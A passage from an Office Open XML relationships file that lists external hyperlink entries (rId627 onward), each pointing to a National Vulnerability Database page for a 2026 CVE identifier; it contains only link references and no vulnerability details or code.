Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 